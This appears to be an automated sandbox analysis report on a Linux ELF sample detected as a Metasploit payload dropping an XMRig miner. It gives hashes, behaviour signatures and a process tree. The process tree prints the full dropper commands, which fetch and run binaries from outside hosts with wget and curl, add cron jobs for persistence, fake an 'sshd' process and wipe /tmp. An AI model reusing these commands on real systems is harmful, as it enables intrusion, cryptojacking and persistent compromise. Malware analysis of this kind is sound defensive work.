Analysis
-
max time kernel
149s -
max time network
128s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
20-10-2024 01:33
Behavioral task
behavioral1
Sample
2636f4d5fa29c3747036d385c3eee167aba1aad58c29597d21df7e42c6149a35.elf
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
2636f4d5fa29c3747036d385c3eee167aba1aad58c29597d21df7e42c6149a35.elf
-
Size
1KB
-
MD5
a3a1adfcbc6207f3e6e0c35d3cf03904
-
SHA1
f10f7793d4d78120395d11d7020ab626995e2c01
-
SHA256
2636f4d5fa29c3747036d385c3eee167aba1aad58c29597d21df7e42c6149a35
-
SHA512
d66495bda3366633baed9e80dafb494bbe39cccb331a1b031c239650866489d6e45db7a9e5f3fe4e951e3f321d9eb9a0c7abf00ede54f6548c4235b9ef3debf9
Malware Config
Extracted
metasploit
encoder/shikata_ga_nai
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/fstream-5.dat family_xmrig behavioral1/files/fstream-5.dat xmrig -
File and Directory Permissions Modification 1 TTPs 38 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1572 sh 1626 chmod 1666 chmod 1727 chmod 1730 chmod 1601 chmod 1644 chmod 1647 chmod 1688 chmod 1698 chmod 1708 chmod 1587 chmod 1593 chmod 1617 grep 1656 chmod 1672 chmod 1712 chmod 1578 chmod 1653 chmod 1675 chmod 1680 chmod 1695 chmod 1715 chmod 1611 chmod 1649 grep 1677 chmod 1588 sh 1590 chmod 1623 chmod 1663 chmod 1681 sh 1691 chmod 1598 chmod 1720 chmod 1723 chmod 1614 chmod 1667 lushput 1705 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /var/tmp/lovely 1588 lovely /var/tmp/unix.sh 1594 unix.sh /var/tmp/truct.sh 1615 truct.sh /var/tmp/brict.sh 1627 brict.sh /var/tmp/sshd 1636 sshd /var/tmp/retrict.sh 1648 retrict.sh /var/tmp/politrict.sh 1657 politrict.sh /tmp/lushput 1667 lushput /tmp/loadbit 1681 loadbit /tmp/seasbit 1681 seasbit /var/tmp/unix.sh 1692 unix.sh /var/tmp/truct.sh 1709 truct.sh /var/tmp/brict.sh 1716 brict.sh /var/tmp/retrict.sh 1724 retrict.sh /var/tmp/politrict.sh 1731 politrict.sh -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_name sshd File opened for reading /sys/devices/virtual/dmi/id/board_vendor sshd File opened for reading /sys/devices/virtual/dmi/id/bios_vendor sshd File opened for reading /sys/devices/virtual/dmi/id/sys_vendor sshd -
Creates/modifies Cron job 1 TTPs 5 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.e8oLXO crontab File opened for modification /var/spool/cron/crontabs/tmp.kG6sTm crontab File opened for modification /etc/crontab sh File opened for modification /etc/crontab sh File opened for modification /var/spool/cron/crontabs/tmp.dcV7nF crontab -
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/board_name sshd File opened for reading /sys/devices/virtual/dmi/id/board_version sshd File opened for reading /sys/devices/virtual/dmi/id/chassis_version sshd File opened for reading /sys/devices/virtual/dmi/id/bios_version sshd File opened for reading /sys/devices/virtual/dmi/id/board_serial sshd File opened for reading /sys/devices/virtual/dmi/id/chassis_serial sshd File opened for reading /sys/devices/virtual/dmi/id/bios_date sshd File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag sshd File opened for reading /sys/devices/virtual/dmi/id/product_version sshd File opened for reading /sys/devices/virtual/dmi/id/product_serial sshd File opened for reading /sys/devices/virtual/dmi/id/product_uuid sshd File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag sshd File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor sshd File opened for reading /sys/devices/virtual/dmi/id/chassis_type sshd -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo sshd -
Reads CPU attributes 1 TTPs 2 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online sshd File opened for reading /sys/devices/system/cpu/possible sshd -
Command and Scripting Interpreter: Unix Shell 1 TTPs 1 IoCs
Execute scripts via Unix Shell.
pid Process 1635 sh -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/firmware/dmi/tables/DMI sshd File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets sshd File opened for reading /sys/bus/cpu/devices/cpu0/cpu_capacity sshd File opened for reading /sys/kernel/mm/hugepages sshd File opened for reading /sys/bus/node/devices/node0/access0/initiators sshd File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages sshd File opened for reading /sys/bus/dax/target_node sshd File opened for reading /sys/fs/cgroup/cgroup.controllers sshd File opened for reading /sys/fs/cgroup/cpuset.cpus.effective sshd File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/id sshd File opened for reading /sys/bus/node/devices/node0/access1/initiators sshd File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages sshd File opened for reading /sys/devices/virtual/dmi/id sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/id sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size sshd File opened for reading /sys/bus/cpu/devices sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map sshd File opened for reading /sys/firmware/dmi/tables/smbios_entry_point sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition sshd File opened for reading /sys/bus/node/devices/node0/meminfo sshd File opened for reading /sys/bus/dax/devices sshd File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages sshd File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages sshd File opened for reading /sys/bus/cpu/devices/cpu0/topology/cluster_cpus sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition sshd File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency sshd File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages sshd File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size sshd File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth sshd File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus sshd File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/id sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/id sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map sshd File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq sshd File opened for reading /sys/bus/node/devices/node0/cpumap sshd File opened for reading /sys/bus/dax/devices/target_node sshd File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map sshd File opened for reading /sys/devices/system/node/online sshd -
description ioc Process File opened for reading /proc/self/maps grep File opened for reading /proc/self/maps grep File opened for reading /proc/self/maps grep File opened for reading /proc/driver/nvidia/gpus sshd File opened for reading /proc/meminfo sshd File opened for reading /proc/self/maps grep File opened for reading /proc/self/exe loadbit File opened for reading /proc/self/maps grep File opened for reading /proc/self/maps grep File opened for reading /proc/mounts sshd File opened for reading /proc/self/cpuset sshd -
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/seasbit curl File opened for modification /tmp/loadbit wget File opened for modification /tmp/loadbit curl File opened for modification /tmp/ovlcap/merge/magic loadbit File opened for modification /tmp/lushput wget File opened for modification /tmp/lushput curl File opened for modification /tmp/seasbit wget
Processes
-
/tmp/2636f4d5fa29c3747036d385c3eee167aba1aad58c29597d21df7e42c6149a35.elf/tmp/2636f4d5fa29c3747036d385c3eee167aba1aad58c29597d21df7e42c6149a35.elf1⤵PID:1572
-
/bin/sh/bin/sh -c "wget -nc http://main.dsn.ovh/dns/lovely -q -P /var/tmp/; chmod 777 /var/tmp/lovely; curl http://main.dsn.ovh/dns/lovely -s -o /var/tmp/lovely; chmod 777 /var/tmp/lovely; cd /var/tmp; ./lovely; cd /var/tmp; rm lovely; wget -nc http://main.dsn.ovh/dns/lushput -q -P /tmp/; chmod 777 /tmp/lushput; curl http://main.dsn.ovh/dns/lushput -s -o /tmp/lushput; chmod 777 /tmp/lushput; cd /tmp; ./lushput 'wget -nc http://main.dsn.ovh/dns/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://main.dsn.ovh/dns/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; ./bitnow; cd /var/tmp; rm bitnow' 2>/dev/null; cd /tmp; rm -rf *; cd /tmp; rm -rf .pkexec; wget -nc http://main.dsn.ovh/dns/seasbit -q -P /tmp/; chmod 777 /tmp/seasbit; curl http://main.dsn.ovh/dns/seasbit -s -o /tmp/seasbit; chmod 777 /tmp/seasbit; wget -nc http://main.dsn.ovh/dns/loadbit -q -P /tmp/; chmod 777 /tmp/loadbit; curl http://main.dsn.ovh/dns/loadbit -s -o /tmp/loadbit; chmod 777 /tmp/loadbit; cd /tmp; ./loadbit 2>/dev/null; cd /tmp; rm -rf *"1⤵
- File and Directory Permissions Modification
PID:1572 -
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/lovely -q -P /var/tmp/2⤵PID:1573
-
-
/usr/bin/chmodchmod 777 /var/tmp/lovely2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/lovely -s -o /var/tmp/lovely2⤵PID:1579
-
-
/usr/bin/chmodchmod 777 /var/tmp/lovely2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/var/tmp/lovely./lovely2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/sh/bin/sh -c "wget -nc http://main.dsn.ovh/dns/unix.sh -q -P /var/tmp/; chmod 777 /var/tmp/unix.sh; curl http://main.dsn.ovh/dns/unix.sh -s -o /var/tmp/unix.sh; chmod 777 /var/tmp/unix.sh; cd /var/tmp; ./unix.sh; cd /var/tmp; rm unix.sh; wget -nc http://main.dsn.ovh/dns/sshd -q -P /var/tmp/; chmod 777 /var/tmp/sshd; curl http://main.dsn.ovh/dns/sshd -s -o /var/tmp/sshd; chmod 777 /var/tmp/sshd; wget -nc http://main.dsn.ovh/dns/config.json -q -P /var/tmp/; curl http://main.dsn.ovh/dns/config.json -s -o /var/tmp/config.json; crontab -l 2>/dev/null | grep -qxF '' || (crontab -l 2>/dev/null ; echo '') | crontab -; wget -nc http://main.dsn.ovh/dns/truct.sh -q -P /var/tmp/; chmod 777 /var/tmp/truct.sh; curl http://main.dsn.ovh/dns/truct.sh -s -o /var/tmp/truct.sh; chmod 777 /var/tmp/truct.sh; cd /var/tmp; ./truct.sh 2>/dev/null; cd /var/tmp; rm truct.sh; wget -nc http://main.dsn.ovh/dns/brict.sh -q -P /var/tmp/; chmod 777 /var/tmp/brict.sh; curl http://main.dsn.ovh/dns/brict.sh -s -o /var/tmp/brict.sh; chmod 777 /var/tmp/brict.sh; cd /var/tmp; ./brict.sh 2>/dev/null; cd /var/tmp; rm brict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'; wget -nc http://main.dsn.ovh/dns/retrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/retrict.sh; curl http://main.dsn.ovh/dns/retrict.sh -s -o /var/tmp/retrict.sh; chmod 777 /var/tmp/retrict.sh; cd /var/tmp; ./retrict.sh 2>/dev/null; cd /var/tmp; rm retrict.sh; wget -nc http://main.dsn.ovh/dns/politrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/politrict.sh; curl http://main.dsn.ovh/dns/politrict.sh -s -o /var/tmp/politrict.sh; chmod 777 /var/tmp/politrict.sh; cd /var/tmp; ./politrict.sh 2>/dev/null; cd /var/tmp; rm politrict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'"2⤵
- File and Directory Permissions Modification
PID:1588 -
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/unix.sh -q -P /var/tmp/3⤵PID:1589
-
-
/usr/bin/chmodchmod 777 /var/tmp/unix.sh3⤵
- File and Directory Permissions Modification
PID:1590
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/unix.sh -s -o /var/tmp/unix.sh3⤵PID:1591
-
-
/usr/bin/chmodchmod 777 /var/tmp/unix.sh3⤵
- File and Directory Permissions Modification
PID:1593
-
-
/var/tmp/unix.sh./unix.sh3⤵
- Executes dropped EXE
PID:1594
-
-
/bin/sh/bin/sh ./unix.sh3⤵PID:1594
-
-
/usr/bin/rmrm unix.sh3⤵PID:1596
-
-
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/sshd -q -P /var/tmp/3⤵PID:1597
-
-
/usr/bin/chmodchmod 777 /var/tmp/sshd3⤵
- File and Directory Permissions Modification
PID:1598
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/sshd -s -o /var/tmp/sshd3⤵PID:1599
-
-
/usr/bin/chmodchmod 777 /var/tmp/sshd3⤵
- File and Directory Permissions Modification
PID:1601
-
-
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/config.json -q -P /var/tmp/3⤵PID:1602
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/config.json -s -o /var/tmp/config.json3⤵PID:1603
-
-
/usr/bin/grepgrep -qxF3⤵
- Reads runtime system information
PID:1606
-
-
/usr/bin/crontabcrontab -l3⤵PID:1605
-
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:1608
-
-
/usr/bin/crontabcrontab -l3⤵PID:1609
-
-
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/truct.sh -q -P /var/tmp/3⤵PID:1610
-
-
/usr/bin/chmodchmod 777 /var/tmp/truct.sh3⤵
- File and Directory Permissions Modification
PID:1611
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/truct.sh -s -o /var/tmp/truct.sh3⤵PID:1612
-
-
/usr/bin/chmodchmod 777 /var/tmp/truct.sh3⤵
- File and Directory Permissions Modification
PID:1614
-
-
/var/tmp/truct.sh./truct.sh3⤵
- Executes dropped EXE
PID:1615
-
-
/bin/sh/bin/sh ./truct.sh3⤵PID:1615
-
/usr/bin/grepgrep -qxF "0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://main.dsn.ovh/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.dsn.ovh/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.dsn.ovh/dns/config.json; cd /var/tmp; curl http://main.dsn.ovh/dns/config.json -o config.json'"4⤵
- File and Directory Permissions Modification
- Reads runtime system information
PID:1617
-
-
/usr/bin/crontabcrontab -l4⤵PID:1616
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1619
-
-
/usr/bin/crontabcrontab -l4⤵PID:1620
-
-
-
/usr/bin/rmrm truct.sh3⤵PID:1621
-
-
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/brict.sh -q -P /var/tmp/3⤵PID:1622
-
-
/usr/bin/chmodchmod 777 /var/tmp/brict.sh3⤵
- File and Directory Permissions Modification
PID:1623
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/brict.sh -s -o /var/tmp/brict.sh3⤵PID:1624
-
-
/usr/bin/chmodchmod 777 /var/tmp/brict.sh3⤵
- File and Directory Permissions Modification
PID:1626
-
-
/var/tmp/brict.sh./brict.sh3⤵
- Executes dropped EXE
PID:1627
-
-
/bin/sh/bin/sh ./brict.sh3⤵PID:1627
-
/usr/bin/grepgrep -qxF "* * * * * /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'"4⤵
- Reads runtime system information
PID:1629
-
-
/usr/bin/crontabcrontab -l4⤵PID:1628
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1631
-
-
/usr/bin/crontabcrontab -l4⤵PID:1632
-
-
-
/usr/bin/rmrm brict.sh3⤵PID:1633
-
-
/usr/bin/flock/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"3⤵PID:1634
-
/bin/sh/bin/sh -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"4⤵
- Command and Scripting Interpreter: Unix Shell
PID:1635
-
-
-
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/retrict.sh -q -P /var/tmp/3⤵PID:1637
-
-
/usr/bin/chmodchmod 777 /var/tmp/retrict.sh3⤵
- File and Directory Permissions Modification
PID:1644
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/retrict.sh -s -o /var/tmp/retrict.sh3⤵PID:1645
-
-
/usr/bin/chmodchmod 777 /var/tmp/retrict.sh3⤵
- File and Directory Permissions Modification
PID:1647
-
-
/var/tmp/retrict.sh./retrict.sh3⤵
- Executes dropped EXE
PID:1648
-
-
/bin/sh/bin/sh ./retrict.sh3⤵
- Creates/modifies Cron job
PID:1648 -
/usr/bin/grepgrep -qxF "0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://main.dsn.ovh/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.dsn.ovh/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.dsn.ovh/dns/config.json; cd /var/tmp; curl http://main.dsn.ovh/dns/config.json -o config.json'" /etc/crontab4⤵
- File and Directory Permissions Modification
- Reads runtime system information
PID:1649
-
-
-
/usr/bin/rmrm retrict.sh3⤵PID:1650
-
-
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/politrict.sh -q -P /var/tmp/3⤵PID:1651
-
-
/usr/bin/chmodchmod 777 /var/tmp/politrict.sh3⤵
- File and Directory Permissions Modification
PID:1653
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/politrict.sh -s -o /var/tmp/politrict.sh3⤵PID:1654
-
-
/usr/bin/chmodchmod 777 /var/tmp/politrict.sh3⤵
- File and Directory Permissions Modification
PID:1656
-
-
/var/tmp/politrict.sh./politrict.sh3⤵
- Executes dropped EXE
PID:1657
-
-
/bin/sh/bin/sh ./politrict.sh3⤵
- Creates/modifies Cron job
PID:1657 -
/usr/bin/grepgrep -qxF "* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'" /etc/crontab4⤵
- Reads runtime system information
PID:1658
-
-
-
/usr/bin/rmrm politrict.sh3⤵PID:1659
-
-
/usr/bin/flock/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"3⤵PID:1660
-
-
-
/usr/bin/rmrm lovely2⤵PID:1661
-
-
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/lushput -q -P /tmp/2⤵
- Writes file to tmp directory
PID:1662
-
-
/usr/bin/chmodchmod 777 /tmp/lushput2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/lushput -s -o /tmp/lushput2⤵
- Writes file to tmp directory
PID:1664
-
-
/usr/bin/chmodchmod 777 /tmp/lushput2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/lushput./lushput "wget -nc http://main.dsn.ovh/dns/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://main.dsn.ovh/dns/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; ./bitnow; cd /var/tmp; rm bitnow"2⤵
- File and Directory Permissions Modification
- Executes dropped EXE
PID:1667
-
-
/usr/bin/rmrm -rf 2636f4d5fa29c3747036d385c3eee167aba1aad58c29597d21df7e42c6149a35.elf "GCONV_PATH=." gdm3-config-err-iIuYvn lushput snap-private-tmp systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-ModemManager.service-CKFZXH systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-colord.service-yahEwh systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-power-profiles-daemon.service-0tVReK systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-switcheroo-control.service-md24eF systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-systemd-logind.service-frRyTc systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-systemd-oomd.service-lX8BEz systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-systemd-resolved.service-GVR3t3 systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-systemd-timedated.service-YDDFq1 systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-upower.service-9PB4Ix2⤵PID:1669
-
-
/usr/bin/rmrm -rf .pkexec2⤵PID:1670
-
-
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/seasbit -q -P /tmp/2⤵
- Writes file to tmp directory
PID:1671
-
-
/usr/bin/chmodchmod 777 /tmp/seasbit2⤵
- File and Directory Permissions Modification
PID:1672
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/seasbit -s -o /tmp/seasbit2⤵
- Writes file to tmp directory
PID:1673
-
-
/usr/bin/chmodchmod 777 /tmp/seasbit2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/usr/bin/wgetwget -nc http://main.dsn.ovh/dns/loadbit -q -P /tmp/2⤵
- Writes file to tmp directory
PID:1676
-
-
/usr/bin/chmodchmod 777 /tmp/loadbit2⤵
- File and Directory Permissions Modification
PID:1677
-
-
/usr/bin/curlcurl http://main.dsn.ovh/dns/loadbit -s -o /tmp/loadbit2⤵
- Writes file to tmp directory
PID:1678
-
-
/usr/bin/chmodchmod 777 /tmp/loadbit2⤵
- File and Directory Permissions Modification
PID:1680
-
-
/tmp/loadbit./loadbit2⤵
- Executes dropped EXE
- Reads runtime system information
- Writes file to tmp directory
PID:1681 -
/bin/shsh -c "rm -rf './ovlcap/'"3⤵PID:1683
-
/usr/bin/rmrm -rf ./ovlcap/4⤵PID:1684
-
-
-
-
/tmp/ovlcap/upper/magic./ovlcap/upper/magic shell2⤵PID:1681
-
-
/bin/bash/bin/bash -c /tmp/seasbit2⤵PID:1681
-
-
/tmp/seasbit/tmp/seasbit2⤵
- Executes dropped EXE
PID:1681
-
-
/bin/sh/bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/; chmod 777 /var/tmp/unix.sh; curl http://dash.cloudflare.ovh/mvt/unix.sh -s -o /var/tmp/unix.sh; chmod 777 /var/tmp/unix.sh; cd /var/tmp; ./unix.sh; cd /var/tmp; rm unix.sh; wget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/; chmod 777 /var/tmp/sshd; curl http://dash.cloudflare.ovh/mvt/sshd -s -o /var/tmp/sshd; chmod 777 /var/tmp/sshd; wget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/; curl http://dash.cloudflare.ovh/mvt/config.json -s -o /var/tmp/config.json; crontab -l 2>/dev/null | grep -qxF '' || (crontab -l 2>/dev/null ; echo '') | crontab -; wget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/; chmod 777 /var/tmp/truct.sh; curl http://dash.cloudflare.ovh/mvt/truct.sh -s -o /var/tmp/truct.sh; chmod 777 /var/tmp/truct.sh; cd /var/tmp; ./truct.sh 2>/dev/null; cd /var/tmp; rm truct.sh; wget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/; chmod 777 /var/tmp/brict.sh; curl http://dash.cloudflare.ovh/mvt/brict.sh -s -o /var/tmp/brict.sh; chmod 777 /var/tmp/brict.sh; cd /var/tmp; ./brict.sh 2>/dev/null; cd /var/tmp; rm brict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'; wget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/retrict.sh; curl http://dash.cloudflare.ovh/mvt/retrict.sh -s -o /var/tmp/retrict.sh; chmod 777 /var/tmp/retrict.sh; cd /var/tmp; ./retrict.sh 2>/dev/null; cd /var/tmp; rm retrict.sh; wget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/politrict.sh; curl http://dash.cloudflare.ovh/mvt/politrict.sh -s -o /var/tmp/politrict.sh; chmod 777 /var/tmp/politrict.sh; cd /var/tmp; ./politrict.sh 2>/dev/null; cd /var/tmp; rm politrict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'"2⤵
- File and Directory Permissions Modification
PID:1681 -
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/3⤵PID:1687
-
-
/usr/bin/chmodchmod 777 /var/tmp/unix.sh3⤵
- File and Directory Permissions Modification
PID:1688
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/mvt/unix.sh -s -o /var/tmp/unix.sh3⤵PID:1689
-
-
/usr/bin/chmodchmod 777 /var/tmp/unix.sh3⤵
- File and Directory Permissions Modification
PID:1691
-
-
/var/tmp/unix.sh./unix.sh3⤵
- Executes dropped EXE
PID:1692
-
-
/usr/bin/rmrm unix.sh3⤵PID:1693
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/3⤵PID:1694
-
-
/usr/bin/chmodchmod 777 /var/tmp/sshd3⤵
- File and Directory Permissions Modification
PID:1695
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/mvt/sshd -s -o /var/tmp/sshd3⤵PID:1696
-
-
/usr/bin/chmodchmod 777 /var/tmp/sshd3⤵
- File and Directory Permissions Modification
PID:1698
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/3⤵PID:1699
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/mvt/config.json -s -o /var/tmp/config.json3⤵PID:1700
-
-
/usr/bin/grepgrep -qxF3⤵
- Reads runtime system information
PID:1703
-
-
/usr/bin/crontabcrontab -l3⤵PID:1702
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/3⤵PID:1704
-
-
/usr/bin/chmodchmod 777 /var/tmp/truct.sh3⤵
- File and Directory Permissions Modification
PID:1705
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/mvt/truct.sh -s -o /var/tmp/truct.sh3⤵PID:1706
-
-
/usr/bin/chmodchmod 777 /var/tmp/truct.sh3⤵
- File and Directory Permissions Modification
PID:1708
-
-
/var/tmp/truct.sh./truct.sh3⤵
- Executes dropped EXE
PID:1709
-
-
/usr/bin/rmrm truct.sh3⤵PID:1710
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/3⤵PID:1711
-
-
/usr/bin/chmodchmod 777 /var/tmp/brict.sh3⤵
- File and Directory Permissions Modification
PID:1712
-
-
